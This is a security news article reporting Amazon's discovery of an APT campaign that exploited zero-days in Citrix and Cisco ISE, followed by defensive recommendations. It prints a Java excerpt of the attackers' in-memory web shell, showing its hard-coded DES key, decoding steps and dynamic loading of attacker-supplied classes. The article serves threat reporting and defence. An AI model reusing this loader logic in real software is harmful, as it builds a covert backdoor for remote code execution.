Amazon Confirms APT Group Targets Cisco and Citrix with Zero-Day Vulnerabilities

Published:

spot_img

markdown

Unveiling a Cyber-Espionage Campaign: Amazon’s Insights

Amazon’s threat intelligence team has shed light on a sophisticated cyber-espionage effort orchestrated by an advanced persistent threat (APT) group. This campaign involved the exploitation of undisclosed zero-day vulnerabilities in systems from major tech players like Cisco and Citrix. The focus was on critical identity and network access control systems that enterprises rely on for managing authentication and security policies.

The Discovery of Zero-Day Vulnerabilities

The investigation began with Amazon’s MadPot honeypot service, which detected attempts to exploit the Citrix vulnerability labeled “Bleed Two,” now officially tracked as CVE-2025-5777. Notably, this detection occurred before the vulnerability was publicly disclosed, highlighting the attackers’ early use of this zero-day flaw.

Further analysis linked the same APT group to another zero-day vulnerability within Cisco’s Identity Service Engine (ISE). Amazon provided Cisco with details of a suspicious payload, which helped identify a flaw in the deserialization logic of an undocumented Cisco ISE endpoint.

Critical Vulnerabilities in Focus

The vulnerability, now recognized as CVE-2025-20337, enabled remote code execution before authentication, granting attackers administrator-level access to the compromised systems. Alarmingly, exploitation of this vulnerability took place prior to Cisco even assigning it a CVE number or issuing any patches.

Deployment of Customized Malware

Once the attackers gained a foothold, they deployed a unique web shell camouflaged as a legitimate component of Cisco ISE known as IdentityAuditAction. Unlike standard malware, this backdoor was specifically designed for Cisco ISE environments, increasing the threat’s effectiveness.

Amazon’s investigation indicated that the web shell functioned solely in memory, making it difficult for forensic teams to trace its presence. It utilized Java reflection to inject itself into active threads, registered as an HTTP listener on the Tomcat web server to capture all HTTP requests, and employed a layer of encryption via DES with a non-standard Base64 encoding. An understanding of specific HTTP headers was required for accessing the shell, further obscuring its operations.

Understanding the Attack Mechanism

The authentication mechanism used by the threat actor to access the web shell showcased their advanced techniques. The code snippet illustrated how they manipulated request bodies and employed encryption to conceal malicious activities.

java
if (matcher.find()) {
requestBody = matcher.group(1).replace(“*”, “a”).replace(“$”, “l”);
Cipher encodeCipher = Cipher.getInstance(“DES/ECB/PKCS5Padding”);
decodeCipher = Cipher.getInstance(“DES/ECB/PKCS5Padding”);
byte[] key = “d384922c”.getBytes();
encodeCipher.init(1, new SecretKeySpec(key, “DES”));
decodeCipher.init(2, new SecretKeySpec(key, “DES”));
byte[] data = Base64.getDecoder().decode(requestBody);
data = decodeCipher.doFinal(data);
ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
if (proxyClass == null) {
proxyClass = this.defineClass(data);
} else {
Object f = proxyClass.newInstance();
f.equals(arrOut);
f.equals(request);
f.equals(data);
f.toString();
}
}

Defensive Strategies Against Emerging Threats

The simultaneous exploitation of CVE-2025-20337 and CVE-2025-5777 underscores a troubling trend where APTs zero in on identity and access control infrastructures. According to Amazon, the attacks were indiscriminate and posed a risk to all unpatched or exposed systems.

This “patch-gap” exploitation exemplifies a significant hurdle in the realm of enterprise cybersecurity, as these tactics are frequently employed by well-funded threat groups with robust capabilities or access to sensitive vulnerability information.

Providers and security teams are urged to adopt comprehensive defense strategies, including:

  • Restricted Access: Limit access to privileged security appliances like Cisco ISE and Citrix management portals using network segmentation and firewalls.
  • Monitoring for Anomalies: Vigilantly watch for unusual activities, such as unfamiliar HTTP listeners or abnormal in-memory processes.
  • Keeping Updated: Regularly check vendor advisories and threat intelligence feeds for information on emerging zero-day vulnerabilities.
  • Reduced Internet Exposure: Limit the public internet exposure of critical identity and network control systems, managing access through secure methods like VPNs.

Importance of Cybersecurity Vigilance

Amazon’s findings illustrate how modern threat actors are increasingly targeting identity and access systems to gain entry into networks. By leveraging vulnerabilities like CVE-2025-5777 in Citrix and CVE-2025-20337 in Cisco ISE, attackers have demonstrated both skill and intent in their operations.

Organizations looking to fortify their defenses against such threats can benefit greatly from advanced Vulnerability Management platforms. These solutions enable enterprises to monitor emerging vulnerabilities, prioritize patches based on risk levels, and maintain a proactive stance in cybersecurity.

To better protect against evolving cyber threats, consider exploring how these advanced tools can elevate your security posture.

spot_img

Related articles

Recent articles

Oman Welcomes Wind Turbines for PDO’s Riyah 1 and 2 Projects

OQ Alternative Energy Welcomes First Wind Turbines for Riyah Projects MUSCAT: OQ Alternative Energy (OQAE), a subsidiary of OQ and recognized as the national leader...

ED Targets Industrialist Vikas Garg in ₹190 Crore Customs Duty Scandal

MUMBAI: The case, involving a Mumbai-based trading firm and Delhi businessman Vikas Garg, has drawn in multiple agencies, including the CBI and...

GCC Launches ‘One-Stop’ Travel System; UAE and Bahrain to Pilot in 2025

GCC Implements Streamlined Travel Process for Citizens The Gulf Cooperation Council (GCC) has introduced an innovative "one-stop" travel process aimed at simplifying international movement for...

OpenAI Fights Court Order to Keep User Chat Data in Copyright Case

The demand for conversations related to AI has skyrocketed, with a staggering request of 1.4 billion interactions originally submitted by The New York Times....